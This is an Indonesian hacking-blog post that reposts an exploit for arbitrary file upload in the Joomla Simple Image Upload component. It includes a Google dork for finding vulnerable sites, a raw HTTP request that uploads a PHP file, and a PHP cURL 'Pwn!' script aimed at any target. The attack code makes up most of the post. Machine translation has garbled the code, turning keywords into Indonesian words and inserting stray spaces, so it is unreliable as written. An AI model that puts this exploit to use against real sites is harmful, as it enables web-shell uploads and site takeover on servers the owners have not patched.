Joomla Sederhana Gambar Upload Sewenang Upload File

Oleh chmood

Sabtu, Oktober 10, 2015

# Exploit Judul: Joomla Sederhana Gambar Upload - Sewenang Upload File
# Google Dork: inurl: option = com_simpleimageupload
# Tanggal: 2015/06/23
# Exploit Penulis: CrashBandicotDosPerl
# Penjual Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Versi: 1.0
# Diuji pada: MsWin32

# Vuln Sama untuk Com_Media Kerentanan

# Hidup Permintaan:

POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP / 1.1

Host: 127.0.0.1
User-Agent: Mozilla / 5.0 (Windows NT 6.1; rv: 31.0) Gecko / 20100101 Firefox / 31.0
Terima: text / html, aplikasi / xhtml + xml, aplikasi / xml; q = 0,9, * / *; q = 0,8
Terima-Bahasa: en-us, en; q = 0,5
Terima-Encoding: gzip, mengempis
Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Koneksi: terus-hidup
Content-Type: multipart / form-data; batas = --------- 247062787817068

---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "Filedata"; filename = "L0v3.php." \ r \ n
Content-Type: application / x-php \ r \ n
\ r \ n
0wn3d! ;) \ r \ n
---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "kembali-url" \ r \ n
\ r \ n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
---------- 247062787817068- \ r \ n

# Exploit:

<? php

gema '<form action = metode "#" = "post" enctype = "multipart / form-data">
<input type = "text" name = "target" value = "www.localhost.com" /> <input type = "submit" name = "Pwn" value = "Pwn!" />
</ form> ';

if ($ _ POST) {

$ target = $ _POST ['target'];

$ file = "0wn3d! ;) ";
$ sundulan = array ("Content-Type: application / x-php",
"Content-Disposition: form-data; name = \ "Filedata \"; file = \ "L0v3.php \." ");

$ ch = curl_init(“http://”.$target.”/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component”);
curl_setopt ($ ch, CURLOPT_POST, true);
curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla / 5.0 (Windows NT 6.3; WOW64) AppleWebKit / 537,36 (KHTML, seperti Gecko) Chrome / Safari 43.0.2357.124 / 537,36");
curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('Filedata' => "@ $ file", "kembali-url" => “aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=”,));
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_HTTPHEADER, $ header);
$ hasil = curl_exec ($ ch);
curl_close ($ ch);
mencetak "$ hasil";

} Else {die (); }
?>

# Jalur File: 127.0.0.1/images/[Rand0mString]L0v3.php
# Sh00t untuk Mr_AnarShi-T;

Category

Dork Exploitations

Komentar

Postingan Lebih Baru Postingan Lama

Joomla Sederhana Gambar Upload Sewenang Upload File

Backlink dengan Google Dork Seo

Cara Dapat Backlink dengan Google Dork

Cara Dapat Backlink Edu Gratis

Cara Login Beberapa Akun Dalam 1 Browser [Work Semua Web Login]

Bagi-bagi Dork

Hacking Facebook Using Fake Login

Download File ISO Windows 11 Dan Bootable USB Rufus

5 Software Proxy Terbaik Untuk Anonymous Browsing

Optimasi Meta Tag di New Blogger